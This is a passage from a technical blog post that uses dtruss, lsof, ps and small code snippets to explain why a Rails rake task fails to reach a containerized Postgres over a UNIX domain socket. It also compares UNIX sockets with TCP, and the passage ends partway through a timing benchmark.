&lt;p&gt;So, cool, let&#39;s dig deeper: we have a &lt;code&gt;rake&lt;/code&gt; task that wants to set up a Rails application, and it needs to speak to something external to itself - in this instance, a database - in order to go about its business. If you want to sound smart, you&#39;ll of course call this something like &lt;a href=&quot;https://en.wikipedia.org/wiki/Inter-process_communication&quot;&gt;interprocess communication&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Perhaps the most famous method of interprocess communication is the socket. A socket, in this context, is usually going to refer to sending data through the network, out into the magical world of the internet, and back again.&lt;/p&gt;
&lt;p&gt;This is most commonly done using two nifty protocols: TCP and IP. That&#39;s what I was assuming our &lt;code&gt;rake&lt;/code&gt; command would be using to reach out to Postgres - that&#39;s what we&#39;d get if we connected to &lt;code&gt;localhost:5432&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;One super interesting detail of all this is that our applications aren&#39;t actually &lt;em&gt;allowed&lt;/em&gt; to talk over a socket without getting permission: sitting &lt;em&gt;between&lt;/em&gt; our socket and Ruby (or Python, JavaScript or &lt;em&gt;any programming language&lt;/em&gt;) is going to be the operating system. And it&#39;s the operating system that does a lot of the heavy lifting.&lt;/p&gt;
&lt;p&gt;macOS is a POSIX-compatible operating system, with POSIX being a &lt;a href=&quot;https://pubs.opengroup.org/onlinepubs/9699919799/&quot;&gt;set of standards&lt;/a&gt; for compatibility between operating systems. Linux is generally another one. POSIX operating systems use the Berkeley Sockets API for a standardised method of managing network connections.&lt;/p&gt;
&lt;p&gt;So, we have to ask the OS:&lt;/p&gt;
&lt;img src=&quot;https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/socket-syscall.svg&quot; alt=&quot;Application code can&#39;t make sockets by itself, it needs to make a system call to the operating system&quot; /&gt;
&lt;p&gt;So here we have us, the user, executing code written in Ruby, which provides its own abstraction of the underlying Berkeley Sockets API. The most common Ruby interpreter is written in C - you&#39;ll almost certainly know if you&#39;re &lt;em&gt;not&lt;/em&gt; using it - and its &lt;a href=&quot;https://ruby-doc.org/3.2.2/exts/socket/Socket.html&quot;&gt;Socket class&lt;/a&gt; itself calls out, via POSIX C libraries, to the operating system kernel (the socket calls are just a few of the many possible system calls). Finally, the operating system establishes and maintains the socket connection. So, and I find this wonderful, our little unassuming chain of events ripples all the way through into the protected core of the operating system.&lt;/p&gt;
&lt;p&gt;On macOS, we can use a program called &lt;code&gt;dtruss&lt;/code&gt; (warning: setting up &lt;code&gt;dtruss&lt;/code&gt; to work is a bit of a faff) to take a peek and see what system calls our applications are making. Here it is running for our &lt;code&gt;bundle exec rake db:setup&lt;/code&gt; task.&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;	PID/THRD  SYSCALL&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;args&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; 		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;return&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;.&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;23078&lt;/span&gt;/0x3057d:  socket&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;0x1, 0x1, 0x0&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;23078&lt;/span&gt;/0x3057d:  fcntl&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;0xA, 0x3, 0x2&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;23078&lt;/span&gt;/0x3057d:  fcntl&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;0xA, 0x4, 0x6&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;23078&lt;/span&gt;/0x3057d:  fcntl&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;0xA, 0x2, 0x1&lt;span class=&quot;token 
punctuation&quot;&gt;)&lt;/span&gt;		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;23078&lt;/span&gt;/0x3057d:  setsockopt&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;0xA, 0xFFFF, 0x1022&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;23078&lt;/span&gt;/0x3057d:  connect&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;0xA, 0x7F9B69ACE950, 0x6A&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-1&lt;/span&gt; Err&lt;span class=&quot;token comment&quot;&gt;#2&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;23078&lt;/span&gt;/0x3057d:  close&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;0xA&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;		 &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Let&#39;s dive in and explore a couple of these calls: &lt;code&gt;socket&lt;/code&gt; and &lt;code&gt;connect&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;socket&lt;/code&gt; is defined with the signature of &lt;code&gt;int socket(int domain, int type, int protocol)&lt;/code&gt;; you can probably look it up yourself on your machine with &lt;code&gt;man 2 socket&lt;/code&gt;. We&#39;re calling it with a &lt;code&gt;domain&lt;/code&gt; argument of &lt;code&gt;1&lt;/code&gt;, a &lt;code&gt;type&lt;/code&gt; argument of &lt;code&gt;1&lt;/code&gt; and a protocol of &lt;code&gt;0&lt;/code&gt; (the &lt;code&gt;dtruss&lt;/code&gt; output shows our numbers in hexadecimal format).&lt;/p&gt;
&lt;p&gt;We can map those &lt;code&gt;int&lt;/code&gt; values to constants in &lt;code&gt;sys/socket.h&lt;/code&gt; (on my machine that file is located at &lt;code&gt;/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include/sys/socket.h&lt;/code&gt;, but your mileage may vary) and see that the first two values correspond to &lt;code&gt;AF_UNIX&lt;/code&gt; and &lt;code&gt;SOCK_STREAM&lt;/code&gt;. The last value is set to &lt;code&gt;0&lt;/code&gt;, which asks the kernel to pick the default protocol for that domain and type. If we look up &lt;code&gt;0&lt;/code&gt; in &lt;code&gt;/etc/protocols&lt;/code&gt; we can see it listed as a generic catch-all internet entry.&lt;/p&gt;
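&lt;p&gt;If hunting through header files isn&#39;t your idea of fun, here is a minimal sketch of the same lookup in Python (picked purely for illustration, nothing in this project uses it), whose &lt;code&gt;socket&lt;/code&gt; module exposes the platform&#39;s constants as enums. The helper name &lt;code&gt;decode_socket_args&lt;/code&gt; is made up for this example.&lt;/p&gt;

```python
import socket

def decode_socket_args(domain, sock_type):
    """Map the raw integers from a socket() trace back to constant names."""
    # AddressFamily and SocketKind are the enums behind socket.AF_* and socket.SOCK_*
    family_name = socket.AddressFamily(domain).name
    kind_name = socket.SocketKind(sock_type).name
    return family_name, kind_name

# The dtruss line was socket(0x1, 0x1, 0x0)
names = decode_socket_args(0x1, 0x1)
print(names)
```

&lt;p&gt;On macOS and Linux this should hand back the same two names we found in the header. The numbers are platform-specific, so treat the output as a property of the machine you run it on rather than a universal truth.&lt;/p&gt;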
&lt;p&gt;The return value from &lt;code&gt;socket&lt;/code&gt; is shown as &lt;code&gt;10 0&lt;/code&gt; - we&#39;re actually tracking &lt;em&gt;two&lt;/em&gt; values, which feels a little cool and unfamiliar. The first is the return value from the syscall: &lt;code&gt;10&lt;/code&gt;. This is a reference to the file descriptor of the new socket, which we&#39;ll get to in a minute. The second return value is &lt;code&gt;0&lt;/code&gt;, which represents the global &lt;code&gt;errno&lt;/code&gt; variable used by the kernel to add more context to system call failures. &lt;code&gt;0&lt;/code&gt; means all good, which is great.&lt;/p&gt;
&lt;p&gt;So we&#39;ve now confirmed our expectation that the macOS kernel creates and manages a socket for our Ruby application. We can also see that we asked the operating system for a UNIX socket (&lt;code&gt;AF_UNIX&lt;/code&gt;). These are also known as domain sockets, which is what &lt;code&gt;database.yml&lt;/code&gt; mentioned. We said that sockets &lt;em&gt;usually&lt;/em&gt; travel over the internet, but these UNIX sockets are slightly different: they send messages between processes directly via the operating system kernel itself. These bytes aren&#39;t even making it to our networking hardware.&lt;/p&gt;
&lt;p&gt;Compare that to TCP/IP over &lt;code&gt;AF_INET&lt;/code&gt;:&lt;/p&gt;
&lt;img src=&quot;https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/tcp-and-unix-sockets.svg&quot; alt=&quot;A side-by-side look at TCP/IP and UNIX socket stacks.&quot; /&gt;
&lt;p&gt;Regardless of their type, sockets lie dormant after being created, waiting for a &lt;code&gt;connect&lt;/code&gt; call. The first argument we send to &lt;code&gt;connect&lt;/code&gt; is an integer &lt;code&gt;10&lt;/code&gt;, which is the reference to the file descriptor - apologies, I know, I said we&#39;d get to those and we haven&#39;t yet - of the socket we got earlier. The next argument is the memory address, &lt;code&gt;0x7F9B69ACE950&lt;/code&gt;, which points to a &lt;code&gt;struct&lt;/code&gt; (of type &lt;code&gt;sockaddr_un&lt;/code&gt;) with a member field (&lt;code&gt;sun_path&lt;/code&gt;) containing the path to the &lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt; file. If we were initializing that &lt;code&gt;struct&lt;/code&gt; directly in C, it might look like this:&lt;/p&gt;
&lt;pre class=&quot;language-c&quot;&gt;&lt;code class=&quot;language-c&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;sockaddr_un&lt;/span&gt; my_cool_socket &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;sun_family &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; AF_UNIX&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;sun_path &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;/tmp/.s.PGSQL.5432&quot;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The final argument to &lt;code&gt;connect&lt;/code&gt; is the length, in bytes, of the aforementioned structure. Our file &lt;em&gt;does not&lt;/em&gt; exist, so the &lt;code&gt;connect&lt;/code&gt; call returns a &lt;code&gt;-1&lt;/code&gt; (the universal sign of failure) and it sets that global &lt;code&gt;errno&lt;/code&gt; variable used by the kernel to &lt;code&gt;2&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;What does &lt;code&gt;2&lt;/code&gt; mean here? We can take a peep on macOS with &lt;code&gt;man errno&lt;/code&gt;, which gives us this: &lt;code&gt;2 ENOENT No such file or directory.  A component of a specified pathname did not exist, or the pathname was an empty string.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Sounds about right! Our program is trying to connect to the UNIX socket file as a client, and the lack of that file&#39;s existence means that there&#39;s no corresponding server to chat to; the Postgres we have running in a container is only exposing TCP/IP to our macOS system.&lt;/p&gt;
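&lt;p&gt;To watch that failure happen without Rails in the way, here is a hedged sketch in Python that makes the same &lt;code&gt;socket&lt;/code&gt; and &lt;code&gt;connect&lt;/code&gt; calls by hand. &lt;code&gt;try_unix_connect&lt;/code&gt; is a hypothetical helper, and the path lives in a fresh temporary directory (an assumption made so that nothing can possibly be listening there).&lt;/p&gt;

```python
import errno
import os
import socket
import tempfile

def try_unix_connect(path):
    """Return 0 on success, or the errno from a failed connect()."""
    client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        client.connect(path)
        return 0
    except OSError as err:
        # Python surfaces the errno set by the failed system call
        return err.errno
    finally:
        client.close()

# A socket path that nobody has created
scratch_dir = tempfile.mkdtemp()
missing_path = os.path.join(scratch_dir, ".s.PGSQL.5432")

result = try_unix_connect(missing_path)
os.rmdir(scratch_dir)
print(result, errno.errorcode.get(result))
```

&lt;p&gt;With no server bound to the path, the error number that comes back should be the same &lt;code&gt;ENOENT&lt;/code&gt; that &lt;code&gt;dtruss&lt;/code&gt; showed us.&lt;/p&gt;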
&lt;h2 id=&quot;file-under-something&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/#file-under-something&quot;&gt;File Under Something&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;It is a common refrain to say that &lt;a href=&quot;https://en.wikipedia.org/wiki/Everything_is_a_file&quot;&gt;almost everything in UNIX is a file&lt;/a&gt;. The sockets we create with the &lt;code&gt;socket&lt;/code&gt; syscall are files, our desired &lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt; UNIX domain socket path is a file and, you know, files we normally associate with being files are also files. The UNIX file is itself this kind of wonderful abstraction that allows us to (mostly) avoid the ins-and-outs of, say, how these files are actually stored as bytes.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;lsof&lt;/code&gt; conjures up a beautiful list of all open files on the system. It&#39;s huge:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# wc -l counts the number of lines&lt;/span&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;lsof&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;wc&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-l&lt;/span&gt;&lt;br /&gt;   &lt;span class=&quot;token number&quot;&gt;15413&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In its default state, &lt;code&gt;lsof&lt;/code&gt; looks at every file being used by every process. Processes are a pretty powerful abstraction used by the operating system to make computers work, and at a high-level each process on the system &lt;a href=&quot;https://pages.cs.wisc.edu/~remzi/OSTEP/&quot;&gt;represents a running program&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As part of running each process, the operating system kernel keeps track of the files allocated to it. By convention, each process starts with three file descriptors - &lt;code&gt;0&lt;/code&gt;, &lt;code&gt;1&lt;/code&gt; and &lt;code&gt;2&lt;/code&gt; - which represent &lt;code&gt;stdin&lt;/code&gt;, &lt;code&gt;stdout&lt;/code&gt; and &lt;code&gt;stderr&lt;/code&gt;. Right off the bat, this shows us that &lt;em&gt;files&lt;/em&gt; don&#39;t have to correspond with our traditional mental model of a file.&lt;/p&gt;
&lt;p&gt;File descriptors are like a ticket for the process to use; the operating system sits between the process and the files, and read and write commands have to go through it (via some more operating system calls). Processes go up to the operating system and ask to, say, read &lt;code&gt;x&lt;/code&gt; number of bytes from the file represented by file descriptor &lt;code&gt;y&lt;/code&gt;. The operating system then goes off, runs a series of checks, and then &lt;em&gt;may&lt;/em&gt; return the result of that request if everything is tickety-boo.&lt;/p&gt;
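&lt;p&gt;That ticket exchange can be sketched in a few lines of Python, using the thin wrappers its &lt;code&gt;os&lt;/code&gt; module provides over the underlying system calls. The helper &lt;code&gt;read_first_bytes&lt;/code&gt; and the scratch file are invented for this illustration.&lt;/p&gt;

```python
import os
import tempfile

def read_first_bytes(path, count):
    """Open a file, ask for count bytes via its descriptor, then close it."""
    fd = os.open(path, os.O_RDONLY)  # the kernel hands back an integer ticket
    try:
        # "please read count bytes from the file behind descriptor fd"
        return fd, os.read(fd, count)
    finally:
        os.close(fd)

# A scratch file so the example has something to read
with tempfile.NamedTemporaryFile(delete=False) as handle:
    handle.write(b"tickety-boo")
    demo_path = handle.name

fd_number, first_bytes = read_first_bytes(demo_path, 7)
os.unlink(demo_path)
print(fd_number, first_bytes)
```

&lt;p&gt;The descriptor is just a small integer; which one you get depends on what the process already has open, so don&#39;t expect the same number every time.&lt;/p&gt;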
&lt;p&gt;Each process also gets its own process id (commonly called a pid) and we can look all those up with the &lt;code&gt;ps&lt;/code&gt; command:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# -A displays processes belonging to all users, including those that aren&#39;t being used from the current terminal&lt;/span&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;ps&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;wc&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-l&lt;/span&gt;&lt;br /&gt;     &lt;span class=&quot;token number&quot;&gt;507&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At this point, I&#39;ve installed and started the aforementioned Postgres.app so we have a working reference point for what we &lt;em&gt;should&lt;/em&gt; be seeing. With a Postgres server up and running locally, we can run &lt;code&gt;ps&lt;/code&gt; and then we can &lt;code&gt;grep&lt;/code&gt; through that:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;ps&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;grep&lt;/span&gt; postgres&lt;br /&gt; &lt;span class=&quot;token number&quot;&gt;7847&lt;/span&gt; ??         &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;:54.81 /Applications/Postgres.app/Contents/Versions/14/bin/postgres &lt;span class=&quot;token parameter variable&quot;&gt;-D&lt;/span&gt; /Users/martin/Library/Application Support/Postgres/var-14 &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;5432&lt;/span&gt;&lt;br /&gt; &lt;span class=&quot;token number&quot;&gt;7849&lt;/span&gt; ??         &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;:00.38 postgres: checkpointer&lt;br /&gt; &lt;span class=&quot;token number&quot;&gt;7850&lt;/span&gt; ??         &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;:06.02 postgres: background writer&lt;br /&gt; &lt;span class=&quot;token number&quot;&gt;7851&lt;/span&gt; ??         &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;:05.06 postgres: walwriter&lt;br /&gt; &lt;span class=&quot;token number&quot;&gt;7852&lt;/span&gt; ??         &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;:41.56 postgres: autovacuum launcher&lt;br /&gt; &lt;span class=&quot;token number&quot;&gt;7853&lt;/span&gt; ??         &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt;:05.86 postgres: stats collector&lt;br /&gt; &lt;span class=&quot;token number&quot;&gt;7854&lt;/span&gt; ??         
&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;:00.46 postgres: logical replication launcher&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;16014&lt;/span&gt; ttys002    &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;:00.00 &lt;span class=&quot;token function&quot;&gt;grep&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;--color&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;auto --exclude-dir&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;.bzr --exclude-dir&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;CVS --exclude-dir&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;.git --exclude-dir&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;.hg --exclude-dir&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;.svn --exclude-dir&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;.idea --exclude-dir&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;.tox postgres&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Postgres runs a few processes, but at a guess the &lt;code&gt;/bin/postgres&lt;/code&gt; one is probably the one we&#39;re looking for. So that&#39;s got a pid of &lt;code&gt;7847&lt;/code&gt;. We can feed that pid back to &lt;code&gt;lsof&lt;/code&gt;:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# -P stops converting port numbers to port names (e.g. port 80 to http), -p filters by a PID&lt;/span&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;lsof&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-Pp&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;7847&lt;/span&gt;&lt;br /&gt;COMMAND   PID   &lt;span class=&quot;token environment constant&quot;&gt;USER&lt;/span&gt;   FD    TYPE             DEVICE SIZE/OFF                NODE NAME&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;.snip&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;br /&gt;postgres  &lt;span class=&quot;token number&quot;&gt;7847&lt;/span&gt;  martin 10u   unix             0xb49e813effdd307b  0t0        /tmp/.s.PGSQL.5432&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If we peek into the pid of Postgres.app, we can indeed see a path for our &lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt; file. We can see in our &lt;code&gt;TYPE&lt;/code&gt; section that it is, as we explored, a UNIX domain socket.&lt;/p&gt;
&lt;p&gt;Our file descriptor integer for &lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt; associated with &lt;em&gt;this&lt;/em&gt; process is marked as &lt;code&gt;10&lt;/code&gt;  (&lt;code&gt;lsof&lt;/code&gt; suffixes it with a &lt;code&gt;u&lt;/code&gt;, which means it&#39;s open for reading and writing).&lt;/p&gt;
&lt;p&gt;&lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt; is a file, so it is also subject to standard UNIX file permissions:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# -l displays &#39;long mode&#39;: file mode, number of links, owner name, group name, number of bytes in the file, abbreviated month, day-of-month file was last modified, hour file last modified, minute file last modified, and the pathname.&lt;/span&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;ls&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-l&lt;/span&gt; /tmp/.s.PGSQL.5432&lt;br /&gt;srwxrwxrwx  &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; martin  wheel  &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt; Aug &lt;span class=&quot;token number&quot;&gt;21&lt;/span&gt;:40 /tmp/.s.PGSQL.5432&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;srwxrwxrwx&lt;/code&gt; section is the file mode - the first character &lt;code&gt;s&lt;/code&gt; shows that this is a socket, and the &lt;code&gt;rwxrwxrwx&lt;/code&gt; shows that the socket can be read, written and executed by the owner, the group and every other user on the system (&lt;code&gt;777&lt;/code&gt; in octal notation); it&#39;s wide open. If it showed, say, &lt;code&gt;srwx------&lt;/code&gt; (&lt;code&gt;700&lt;/code&gt; in octal notation) then only the owner (in this example, &lt;code&gt;martin&lt;/code&gt;) could interact with it.&lt;/p&gt;
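&lt;p&gt;To make the mapping between the mode string and octal notation concrete, here is a minimal sketch in plain bash. The &lt;code&gt;mode_to_octal&lt;/code&gt; function is a hypothetical helper written for this illustration, not a standard tool, and it deliberately ignores the setuid, setgid and sticky bits as well as the &lt;code&gt;@&lt;/code&gt; or &lt;code&gt;+&lt;/code&gt; suffix that macOS sometimes appends.&lt;/p&gt;

```shell
# Hypothetical helper: turn the permission characters printed by `ls -l`
# (with or without the leading file-type character) into octal notation.
mode_to_octal() {
  local mode="$1" octal="" triplet digit
  # Drop the leading file-type character (s, d, l, -) if it is present.
  if [ "${#mode}" -eq 10 ]; then
    mode="${mode#?}"
  fi
  # Anything other than nine permission characters is not handled here.
  if [ "${#mode}" -ne 9 ]; then
    return 1
  fi
  while [ -n "$mode" ]; do
    triplet="${mode%"${mode#???}"}"   # first three characters
    mode="${mode#???}"                # the rest
    digit=0
    case "$triplet" in r??) digit=$((digit + 4)) ;; esac
    case "$triplet" in ?w?) digit=$((digit + 2)) ;; esac
    # s and t in the last slot mean "executable plus a special bit";
    # only the execute bit is counted in this sketch.
    case "$triplet" in ??[xst]) digit=$((digit + 1)) ;; esac
    octal="$octal$digit"
  done
  printf '%s\n' "$octal"
}

mode_to_octal srwxrwxrwx
mode_to_octal srwx------
```

&lt;p&gt;Each group of three characters becomes one octal digit: read is worth 4, write 2 and execute 1.&lt;/p&gt;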
&lt;p&gt;One thing that always blows my mind while simultaneously making perfect sense is that the file &lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt; here isn&#39;t actually hitting the disk to read and write bytes. Writing to the disk is much slower than keeping information in kernel memory. And, because you&#39;re not going through extra layers of networking, communication over UNIX sockets should technically be &lt;em&gt;faster&lt;/em&gt; than using a &lt;code&gt;localhost&lt;/code&gt; TCP/IP connection.&lt;/p&gt;
&lt;p&gt;In the context of day-to-day local development, you will almost certainly not need that extra speed, most of the time...&lt;/p&gt;
&lt;p&gt;... but just &lt;em&gt;how&lt;/em&gt; much faster, though?&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;time&lt;/span&gt; client &lt;span class=&quot;token parameter variable&quot;&gt;-network&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;tcp&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-address&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;localhost:8080&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-input&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./war-and-peace.txt&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-loop&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;5&lt;/span&gt;.73s user &lt;span class=&quot;token number&quot;&gt;9&lt;/span&gt;.54s system &lt;span class=&quot;token number&quot;&gt;66&lt;/span&gt;% cpu &lt;span class=&quot;token number&quot;&gt;22.862&lt;/span&gt; total&lt;br /&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;time&lt;/span&gt; client &lt;span class=&quot;token parameter variable&quot;&gt;-network&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;unix&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-address&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./sock.sock&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-input&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;./war-and-peace.txt&quot;&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-loop&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;.55s user &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt;.82s system &lt;span class=&quot;token number&quot;&gt;73&lt;/span&gt;% cpu &lt;span class=&quot;token 
